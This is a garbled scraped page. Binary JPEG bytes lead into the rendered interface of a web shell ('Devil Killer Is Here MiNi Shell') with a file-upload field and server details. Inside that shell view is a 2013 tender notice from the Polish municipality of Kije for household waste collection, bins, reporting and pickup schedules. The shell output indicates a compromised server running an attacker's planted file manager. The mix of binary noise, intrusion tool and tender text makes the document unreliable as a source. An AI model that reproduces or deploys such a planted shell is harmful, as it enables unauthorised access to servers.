JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130531/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130531/210922-N-2013.html

<p class="kh_header"><b>Kije: Odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych położonych na terenie gminy Kije</b><br>
<b>Numer ogłoszenia: 210922 - 2013; data zamieszczenia: 31.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kije , Kije 16, 28-404 Kije, woj. świętokrzyskie, tel. 041 3568009, faks 041 3568009.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kije.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych położonych na terenie gminy Kije.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest odbieranie i zagospodarowanie (odzysk lub unieszkodliwienie) odpadów komunalnych (w szacunkowej ilości 450 Mg/rok) powstałych i zebranych na wszystkich nieruchomościach, na których zamieszkują mieszkańcy, położonych w granicach administracyjnych gminy Kije oraz z Punktu Selektywnej Zbiórki Odpadów Komunalnych.
Wykonawca podczas realizacji zamówienia zapewni osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenie masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania, zgodnie z zapisami ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2012 r. poz. 391 z późn. zm.), zapisami Planu gospodarki odpadami dla województwa świętokrzyskiego 2012 - 2018 wprowadzonego uchwałą Nr XXI/360/12 z dnia 28 czerwca 2012 r. w sprawie uchwalenia Planu Gospodarki Odpadami Dla Województwa Świętokrzyskiego oraz postanowieniami Uchwał:
- Uchwała Nr XXVII/189/13  Rady Gminy w Kijach z  dnia  18 marca 2013r. 
w sprawie przyjęcia Regulaminu utrzymania czystości i porządku na terenie gminy Kije.
- Uchwała Nr XXVII/193/13 Rady Gminy w Kijach z dnia 18 marca 2013 w sprawie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów.
2. Charakterystyka Gminy Kije
a) Powierzchnia Gminy Kije wynosi 10017 ha. Liczba miejscowości wynosi 20.
b) Liczba mieszkańców gminy zameldowanych na pobyt stały i czasowy wg stanu na dzień 20.05.2013 r. wynosi   4624 mieszkańców
c) Trend wzrostowy liczby mieszkańców zameldowanych na koniec każdego roku kształtował się następująco:
Gmina Kije	Liczba mieszkańców na koniec roku
	2008	2009	2010	2011	2012
	4628	4684	4568	4509	4612
d) Szacunkowa liczba gospodarstw domowych wynosi 1219 -, wg stanu na dzień 20.05.2013 r. - z następującym rozbiciem na poszczególne miejscowości:
Lp.	Miejscowość	Liczba gospodarstw 	Liczba osób
1	Borczyn	27	75
2	Czechów	71	208
3	Gartatowice	52	153
4	Gołuchów	62	190
5	Górki	44	181
6	Hajdaszek	23	92
7	Janów	30	101
8	Kije	144	423
9	Kliszów	65	185
10	Kokot	55	184
11	Lipnik	59	155
12	Rębów	51	164
13	Samostrzałów	36	106
14	Stawiany	87	279
15	Umianowice	97	265
16	Wierzbica	61	215
17	Włoszczowice	177	603
18	Wola Żydowska	45	156
18	Wymysłów	12	45
20	Żydówek	21	91
RAZEM	1219	3871

Wykonawca przy sporządzaniu oferty zobowiązany jest uwzględnić zmiany ilości nieruchomości oraz liczby mieszkańców w trakcie trwania umowy.
e) Rodzaje zabudowy na terenie gminy Kije:
a) Zabudowa wielorodzinna  w miejscowości Włoszczowice -  wspólnota  bloki kolejowe nr 2 i 3,
b) Pozostała zabudowa na terenie gminy to zabudowa niska jednorodzinna                     oraz zagrodowa.
f) Kilometraż dróg wynosi ogółem 133,123  km, w tym:
a) droga krajowa  Nr 78 ( nawierzchnia bitumiczna):  11 km,
b) droga wojewódzka 766 (nawierzchnia bitumiczna): 11   km,
c) drogi powiatowe: 56,749 km w tym: nawierzchnia bitumiczna 48,198 km, nawierzchnia tłuczniowa 6,551 km,  gruntowa 2 km,
d) drogi gminne 54,374 km w tym: nawierzchnia bitumiczna  24,834 km, nawierzchnia betonowa 0,36 km, nawierzchnia tłuczniowa 2,562  km, nawierzchnia gruntowa 12,384
e) Załącznik graficzny   z siecią dróg na terenie gminy  Kije  stanowi załącznik nr 8 do SIWZ.
3. Opis obecnego systemu wywozu odpadów.
Na terenie gminy Kije prowadzona jest zbiórka niesegregowanych (zmieszanych) odpadów komunalnych.  Nie jest prowadzona selektywna zbiórka odpadów. Odpady zbierane są w metalowych i plastikowych pojemnikach o pojemności 120 l, 110 l, w które wyposażone są   gospodarstwa indywidualne  oraz w kontenerach KP-7, które znajdują się przy budynkach użyteczności publicznej jak np. szkoły, urząd gminy. Pojemniki nie są własnością mieszkańców. Właściciel nieruchomości  raz w miesiącu wystawia pojemnik przed posesję dla przedsiębiorcy z którym ma  podpisaną indywidualną umowę. Odbiór odpadów odbywa się w dni robocze.
Ilość odpadów zmieszanych z obszaru Gminy Kije  odebranych w latach 2009 - 2012 
z nieruchomości zamieszkałych i niezamieszkałych:
Rok 2009 -  365 mg
Rok 2010 -  202 Mg
Rok 2011 -  319 Mg
Rok 2012 -  345,5 Mg
Uwaga: Wykonawca winien przy sporządzaniu oferty dokonać indywidualnego szacunku ilości odpadów.
4. Wykonawca zobowiązany jest do zagospodarowania (odbioru, transportu, poddanie odzyskowi lub unieszkodliwieniu) odebranych od właścicieli nieruchomości z terenu gminy Kije zmieszanych odpadów oraz odpadów zielonych i innych bioodpadów zgodnie z Wojewódzkim Planem Gospodarki Odpadami tj. 5 regionu co oznacza, że zebrane odpady komunalne mogą trafić do wskazanej w planie instalacji przewidzianej do zastępczej obsługi 5 regionu, a po uruchomieniu - do RIPOK w Rzędowie, 
5. Obowiązkiem Wykonawcy będzie również utworzenie i prowadzenie gminnego punktu selektywnego zbierania odpadów komunalnych (PSZOK). Punkt selektywnej zbiórki odpadów Wykonawca zobowiązany będzie zorganizować na terenie Gminy Kije. Prowadzenie PSZOK obejmuje wyposażenie, obsługę, utrzymanie 
w odpowiednim stanie technicznym i sanitarnym urządzeń do zbierania odpadów oraz ich opróżnianie, poprzez sukcesywny wywóz odpadów, tak aby zapewnić możliwość ciągłego dostarczania odpadów przez mieszkańców. Punkt będzie czynny dwa razy w tygodniu w godzinach od 10.00 do 18.00. 
6. Wykonawca zapewni w punkcie selektywnej zbiórki odpadów komunalnych miejsce na ustawienie pojemnika na zużyty sprzęt elektryczny i elektroniczny, którego odbiór nie jest przedmiotem zamówienia. 
7. Wykonawca jest zobowiązany do wyposażenia właścicieli nieruchomości    na czas trwania umowy z Zamawiającym w odpowiednie pojemniki i worki do zbierania odpadów komunalnych wskazane w pkt. 13. Po zakończeniu umowy Wykonawca zabierze pojemniki z nieruchomości.
8. System odbierania odpadów komunalnych nie obejmuje odpadów powstających 
w wyniku prowadzenia działalności gospodarczej.
9. Wykonawca jest zobowiązany do odbierania zużytych opon, odpadów wielkogabarytowych, odpadów budowlano -  remontowych i rozbiórkowych, przeterminowanych leków, chemikaliów, akumulatorów, opakowań po środkach ochrony roślin, świetlówek, popiołu z punktu selektywnej zbiórki odpadów komunalnych.
10. Zagospodarowanie selektywnie zebranych odpadów komunalnych musi być zgodne z hierarchią postępowania z odpadami określoną w art. 4 ust. 1 Dyrektywy Ramowej UE w sprawie odpadów 2008/98/WE.
11. Wykonawca zobowiązany jest do odbierania i zagospodarowania każdej ilości odpadów komunalnych wytworzonych na nieruchomościach, na których zamieszkują mieszkańcy i przekazanych przez właścicieli nieruchomości, oraz z punktu selektywnej zbiórki odpadów komunalnych.
12. W przypadku stwierdzenia, że właściciel nieruchomości po raz pierwszy  dokonał niewłaściwej segregacji  odpadów - Wykonawca nie odbiera odpadów z danego pojemnika  i nakleja na pojemniku nalepkę z napisem Odpady nie zostały odebrane z powodu niewłaściwej segregacji - należy poprawnie posegregować i wystawić do odbioru w  kolejnym terminie wskazanym w harmonogramie odbioru odpadów.
W przypadku nie zastosowania się właściciela nieruchomości do zaleceń, przy kolejnym stwierdzeniu niewłaściwie przeprowadzonej segregacji, Wykonawca zobowiązany jest odebrać  odpady i poinformować  Zamawiającego raportem wskazanym w ust. 17 pkt 2).
13. Rodzaj odpadów stanowiących przedmiot zamówienia
Lp.	Rodzaje odpadów
1	komunalne odpady zmieszane  oraz frakcja odpadów pozostałych  po segregacji o charakterze odpadów zmieszanych
2	papier i tektura
3	tworzywa sztuczne, opakowania wielomateriałowe, szkło, metal zbierane łącznie jako odpady opakowaniowe i inne surowce wtórne
4	meble i inne odpady wielkogabarytowe
5	zużyte opony
6	odpady komunalne ulegające biodegradacji w tym bioodpady, odpady zielone  i odpady opakowaniowe ulegające biodegradacji 

7	odpady budowlano - remontowe i rozbiórkowe
8	przeterminowane leki, chemikalia, akumulatory, opakowania po środkach ochrony roślin, świetlówki, popiół 
14. System gromadzenia odpadów.
a) Na terenie zabudowy jednorodzinnej obowiązywać będzie system mieszany pojemnikowo - workowy zbiórki odpadów komunalnych u źródła:
Selektywna zbiórka odpadów:
- Pojemnik dwukołowy o pojemności min.  60 l w przypadku do 6 osób zamieszkujących nieruchomość, min.  110 l powyżej 6 osób zamieszkujących nieruchomość, w kolorze żółtym  z napisem tworzywa sztuczne, szkło, metal do zbierania  tworzyw sztucznych, opakowań wielomateriałowych, szkła, metalu  łącznie jako odpady opakowaniowe i inne surowce wtórne (szacunkowa ilość pojemników o pojemności min. 60  litrów wynosi 1146 sztuk,  o pojemności min. 110 l  wynosi 63 sztuki).
- Worek z folii polietylenowej LDPE  o grubości minimum 0,15 mm, w kolorze niebieskim z napisem papier  do zbierania papieru i tektury, o pojemności min. 60 l w przypadku do 6 osób zamieszkujących nieruchomość, o pojemności min 110 l powyżej 6 osób  (szacunkowa ilość worków o pojemności min. 60 l wynosi 1146 sztuk, o pojemności min. 110 l wynosi 63 sztuki).
- Pojemnik dwukołowy o pojemności min.  110 l w przypadku do 6 osób zamieszkujących nieruchomość, min.  240 l powyżej 6 osób zamieszkujących nieruchomość, w kolorze brązowym z napisem odpady ulegające biodegradacji do zbierania  odpadów komunalnych ulegających biodegradacji w tym bioodpadów, odpadów zielonych  i odpadów opakowaniowych ulegających biodegradacji - dla właścicieli nieruchomości, którzy nie zadeklarowali kompostowania odpadów ulegających biodegradacji w przydomowym kompostowniku   (szacunkowa ilość pojemników o pojemności min. 110 l wynosi 123 sztuki, o pojemności min. 240 l wynosi 11 sztuk).
- Pojemnik dwukołowy o pojemności min. 110 l w przypadku do 6 osób zamieszkujących nieruchomość, powyżej 6 osób o pojemności  min. 240 l, 
w kolorze czarnym z napisem  pozostałe odpady do zbierania  odpadów 
o charakterze zmieszanym  pozostałych  po segregacji  nie należących do żadnej w w/w kategorii (szacunkowa ilość pojemników o pojemności min. 110 l wynosi 1146 sztuk, o pojemności min. 240 l wynosi 63 szt.).
Nieselektywna zbiórka odpadów:
- Pojemnik dwukołowy o pojemności min. 110 l w przypadku do 6 osób zamieszkujących nieruchomość, powyżej 6 osób min. 240 l w dowolnym kolorze do zbierania  odpadów zmieszanych (szacunkowa ilość pojemników o pojemności min. 110 l wynosi 9 sztuk).
b) W zabudowie wielolokalowej obowiązywał będzie system  mieszany  pojemnikowo - workowy zbiórki odpadów komunalnych u źródła.
Selektywna zbiórka odpadów w zabudowie wielolokalowej:
- Kontener o pojemności minimalnej 7 m3 metalowy lub z tworzywa sztucznego  z napisem tworzywa sztuczne, szkło, metal do zbierania  tworzyw sztucznych, opakowań wielomateriałowych, szkła, metalu  łącznie jako odpady opakowaniowe i inne surowce wtórne (szacunkowa ilość kontenerów  wynosi 1).
- Worek z folii polietylenowej LDPE  o grubości minimum 0,15 mm, o pojemności 240 l w kolorze niebieskim z napisem papier do zbierania papieru i tektury (szacunkowa ilość worków wynosi 2).
- Pojemnik czterokołowy z tworzywa sztucznego lub metalowy o pojemności min.  1100 l w kolorze brązowym z napisem odpady ulegające biodegradacji do zbierania  odpadów komunalnych ulegających biodegradacji w tym bioodpadów, odpadów zielonych  i odpadów opakowaniowych ulegających biodegradacji - dla właścicieli nieruchomości, którzy nie zadeklarowali kompostowania odpadów ulegających biodegradacji w przydomowym kompostowniku   (szacunkowa ilość pojemników wynosi 1).
- Pojemnik czterokołowy z tworzywa sztucznego lub metalowy o pojemności min. 1100 l w kolorze czarnym  z napisem pozostałe odpady do zbierania  odpadów o charakterze odpadów zmieszanych  pozostałych  po segregacji  nie należących do żadnej w w/w kategorii (szacunkowa ilość pojemników wynosi 2).
15. Wykonawca zobowiązany jest do wyposażenia właścicieli nieruchomości  odpowiednie pojemniki i worki od dnia podpisania umowy do dnia 01 lipca 2013 r. W późniejszym okresie  trwania umowy  Wykonawca zobowiązany jest  do każdorazowego wyposażenia  właścicieli nieruchomości, od których zostały odebrane odpady komunalne  gromadzone w sposób selektywny w worki  przeznaczone na zbieranie  poszczególnych frakcji odpadów  w dniu odebrania odpadów w ilości odpowiadającej odebranym workom. Na potwierdzenie pierwszego dostarczenia pojemników i worków Wykonawca  przedłoży Zamawiającemu potwierdzenia  od właścicieli nieruchomości  opatrzone datą przekazania i podpisem właściciela bądź jego przedstawiciela. W przypadku niemożności spełnienia tego warunku (co najmniej trzykrotne  nie zastanie właściciela  nieruchomości pod wskazanym adresem w odstępach co najmniej trzydniowych w godzinach 7.00 -20.00) Wykonawca wskaże  Zamawiającemu te przyczyny na piśmie i dostarczy pojemniki i worki w możliwie najkrótszym terminie. W trakcie wykonywania umowy Wykonawca wyposaży  zgłoszonych przez Zamawiającego  nowych właścicieli nieruchomości w niezbędne worki i pojemniki  najpóźniej w ciągu  3 dni roboczych na ww zasadach. Wykonawca będzie  odbierał  odpady z nowych nieruchomości  począwszy od  pierwszego tygodnia  następującego po tygodniu, w którym umieszczony został w systemie  odbierania odpadów Zamawiającego. Zamawiający drogą elektroniczną  poinformuje Wykonawcę o nowych adresach nieruchomości, gdzie mają  zostać  dostarczone  pojemniki i worki. Wykonawca odpowiada za stan techniczny dostarczonych pojemników i na wezwanie Zamawiającego  jest obowiązany do ich napraw i wymiany uszkodzonych, zniszczonych lub skradzionych pojemników. Na uzasadniony wniosek właściciela nieruchomości  bądź  zarządzającego  nieruchomościami wielorodzinnymi Zamawiający powiadamia Wykonawcę o konieczności wymiany pojemnika na większy lub mniejszy;                o każdej dokonanej zamianie Wykonawca jest zobowiązany powiadomić Zamawiającego.
Zamawiający nie ponosi odpowiedzialności za niezawinione przypadki zniszczenia lub kradzieży  pojemnika. Wykonawca przy sporządzaniu oferty powinien wkalkulować w cenę takie przypadki.
16. Zagospodarowanie odpadów.
1) Wykonawca jest zobowiązany do:
a) przekazywania odebranych od właścicieli nieruchomości zmieszanych odpadów komunalnych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania do instalacji wskazanych w  Wojewódzkim Planie Gospodarki Odpadami, przyjętym uchwałą Sejmiku Województwa Świętokrzyskiego nr XXI/306/12 z dnia 28 czerwca 2012 r. w sprawie uchwalenia Planu gospodarki odpadami dla województwa Świętokrzyskiego 2012-2018 
b)  przekazywania odebranych od właścicieli nieruchomości zamieszkałych selektywnie zebranych odpadów komunalnych do instalacji odzysku 
i unieszkodliwiania odpadów, zgodnie z hierarchią postępowania z odpadami, 
o której mowa w art. 17 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. 
z 2013 r., poz. 21) lub samodzielnego zagospodarowania zgodnie 
z obowiązującymi przepisami,
c) prowadzenia kart ewidencji odpadów zgodnie z obowiązującymi przepisami.
2) Wykonawca ma obowiązek zagospodarować odpady  tak, aby uzyskać wymagane poziomy recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami  niektórych frakcji odpadów komunalnych papier, metal, szkło, tworzywa sztuczne oraz ograniczyć masę odpadów komunalnych ulegających biodegradacji.  
3) Osiągane przez Wykonawcę poziomy recyklingu, przygotowania do ponownego użycia i odzysku obliczane będą na podstawie wzorów zawartych 
w Rozporządzeniu Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r. poz. 645)  oraz w Rozporządzeniu Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczenia masy tych odpadów (Dz. U. z 2012 r., poz. 676).
4) Weryfikacja osiąganych przez Wykonawcę poziomów recyklingu wykonywana będzie przez pracowników Zamawiającego na podstawie przekazywanych kwartalnych sprawozdań przez Wykonawcę, spełniających wymogi Rozporządzenia Ministra Środowiska z dnia 15 maja 2012 r. w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz. U. z 2012 r., poz. 630).
17. Raporty i inne obowiązki informacyjne:
1) Wykonawca jest zobowiązany do przekazywania Zamawiającemu miesięcznych raportów zawierających informacje o:
a) ilości odebranych odpadów zmieszanych oraz pozostałości po selektywnej zbiórce odpadów Mg,
b) ilości odebranych odpadów szkła Mg,
c) ilości odebranych papieru i tektury Mg,
d) ilości odebranych tworzyw sztucznych Mg,
e) ilości odebranych metali Mg,
f) ilości odebranych opakowań wielomateriałowych Mg,
g) ilości odebranych odpadów wielkogabarytowych Mg,
h) ilości odebranych odpadów budowlano - remontowych i rozbiórkowych Mg,
i) ilości odebranych zużytych opon Mg,
j) ilości odebranych odpadów biodegradowalnych Mg
k) ilości odebranych przeterminowanych leków Mg
l) ilości odebranych chemikaliówMg
m) ilości odebranych akumulatorów Mg
n) ilości odebranych opakowań po środkach ochrony roślin Mg
o) ilości odebranych świetlówek Mg
p) ilości odebranego popiołu Mg 
q) liczbę nieruchomości, od których zostały odebrane odpady komunalne w sposób selektywny oraz liczbę nieruchomości, z których zostały odebrane odpady komunalne zmieszane
r) miejscach i sposobach zagospodarowania ww odpadów, 
s) liczbie i rodzaju  wydanych nowych pojemników oraz worków,
t) liczbie nieruchomości z danymi adresowymi, z których nie zostały odebrane odpady selektywnie zbierane  z powodu  stwierdzenia po raz pierwszy niewłaściwie dokonanej  segregacji
u) liczbie nieruchomości z danymi adresowymi, których właściciele po raz kolejny z rzędu dokonali niewłaściwej segregacji odpadów.
Raporty muszą być przekazane w formie pisemnej i wersji elektronicznej uzgodnionej z Zamawiającym. Prawidłowo sporządzony raport miesięczny zaakceptowany przez Zamawiającego będzie warunkiem do wystawienia faktury za wykonaną usługę.
2) Wykonawca jest zobowiązany do niezwłocznego przekazywania Zamawiającemu drogą elektroniczną w dniu odbioru odpadów informacji o niezgodnym z deklaracją (segreguje nie segreguje) oraz Regulaminem utrzymania czystości i porządku na terenie gminy Kije  gromadzeniu odpadów, w szczególności ich mieszaniu. Informacja powinna zawierać w szczególności:
a) adres nieruchomości, na której odpady gromadzone są w sposób niezgodny 
z deklaracją lub Regulaminem utrzymania czystości i porządku na terenie gminy Kije
b) zdjęcia w postaci cyfrowej dowodzące, że odpady gromadzone są w sposób niewłaściwy. Zdjęcia muszą zostać wykonane w taki sposób, aby nie budząc wątpliwości pozwalały na przypisanie pojemników, w tym worków do konkretnej nieruchomości,
c) pisemne uzasadnienie niewłaściwej segregacji odpadów 
d) dane pracowników wykonawcy, którzy stwierdzili fakt niezgodnego 
z Regulaminem postępowania z odpadami komunalnymi oraz ewentualne oświadczenia przez nich przekazane
e) nieruchomości z danymi adresowymi, z których nie zostały odebrane odpady selektywnie zbierane  z powodu  stwierdzenia po raz pierwszy niewłaściwie dokonanej  segregacji
f) liczbie nieruchomości z danymi adresowymi, których właściciele po raz drugi dokonali niewłaściwej segregacji odpadów
3) Wykonawca jest zobowiązany do bieżącego przekazywania adresów nieruchomości, na których zamieszkują mieszkańcy i zostały wystawione przed posesje odpady do odbioru, a nie ujętych w bazie danych prowadzonej przez Zamawiającego.
4) Wykonawca jest zobowiązany do przedłożenia niezwłocznie na żądanie Zamawiającego poświadczonych za zgodność z oryginałem  kopii dokumentów sporządzanych na potrzeby ewidencji odpadów tj. kart ewidencji odpadów, kart przekazania odpadów do RIPOK lub do instalacji odzysku i unieszkodliwiania, w celu potwierdzenia prawidłowo prowadzonej gospodarki odpadami komunalnymi.
18. Częstotliwość odbierania. Harmonogram.
1) Wymaga się, aby Wykonawca zapewnił odbieranie odpadów z częstotliwością określoną w tabeli t.j. 

Rodzaj odpadów komunalnych 	Sposób odbioru	Częstotliwość odbierania
komunalne odpady zmieszane	pojemniki  - bezpośrednio od mieszkańców nieruchomości	1 raz w miesiącu 
papier, tektura 	worki  bezpośrednio od mieszkańców nieruchomości	1 raz w miesiącu 
tworzywa sztuczne, opakowania wielomateriałowe, szkło, metal zbierane łącznie jako odpady opakowaniowe i inne surowce wtórne	pojemniki  bezpośrednio od mieszkańców nieruchomości	
frakcja odpadów pozostałych  po segregacji  o charakterze odpadów zmieszanych 
	pojemniki bezpośrednio od mieszkańców nieruchomości	1 raz w miesiącu
odpady ulegające biodegradacji	worki  bezpośrednio od mieszkańców nieruchomości	1 raz w miesiącu
odpady wielkogabarytowe, zużyte opony,  odpady budowlane, świetlówki, przeterminowane leki, chemikalia, opakowania po środkach ochrony roślin odpady odbierane z Puntu selektywnej zbiórki odpadów	wg potrzeb
2) Wykonawca zobowiązany jest do opracowania harmonogramu odbierania odpadów, z uwzględnieniem poszczególnych rodzajów odpadów oraz wymagań określonych w dokumentacji przetargowej, w szczególności biorąc pod uwagę, iż odbiór odpadów nie może następować w dni ustawowo wolne od pracy.
3) Pierwszy harmonogram obejmujący okres od dnia 1 lipca 2013 lub od dnia podpisania umowy do dnia 31 grudnia 2013 r. powinien zostać opracowany i przedłożony Zamawiającemu w terminie 10 dni od dnia podpisania umowy.
4) Kolejne harmonogramy powinny obejmować co najmniej rok kalendarzowy. Wykonawca przekaże harmonogram Zamawiającemu w terminie co najmniej 30 dni przed początkiem roku kalendarzowego.
5) Harmonogram powinien być sporządzony w ten sposób, że odbiór odpadów, które odbierane są co najmniej raz w miesiącu, lub rzadziej, powinien zostać ustalony 
w ten sam dzień miesiąca, np. każda druga  środa miesiąca.
6) W przypadku gdy w ustalony dzień tygodnia lub miesiąca dla odbioru odpadów przypada w dniu ustawowo wolnym od pracy, wykonawca zapewni odbiór odpadów w następnym dniu nie będącym dniem ustawowo wolnym od pracy.
7) Przygotowując harmonogram wykonawca uwzględnia m.in. względy sanitarne punktów zbiórki odpadów komunalnych przy domach wielorodzinnych i posesjach indywidualnych (fermentacja odpadów w pojemnikach, kontenerach, żerowanie gryzoni, bezdomnych zwierząt itp.) oraz potrzeby właścicieli nieruchomości.
8) Harmonogram powinien odpowiadać następującym wytycznym:
- powinien być sformułowany w sposób przejrzysty, jasny, pozwalający na szybkie zorientowanie się co do konkretnych dat odbierania odpadów, jak też regularności i powtarzalności odbierania odpadów poszczególnych rodzajów,
- powinien wskazywać na daty odbierania poszczególnych rodzajów odpadów z nieruchomości.
9) Wykonawca powinien umieścić harmonogram na własnej stronie internetowej 
i eksponować go przez cały okres na jaki został przygotowany. Zamawiający również umieści harmonogram na własnej stronie internetowej.
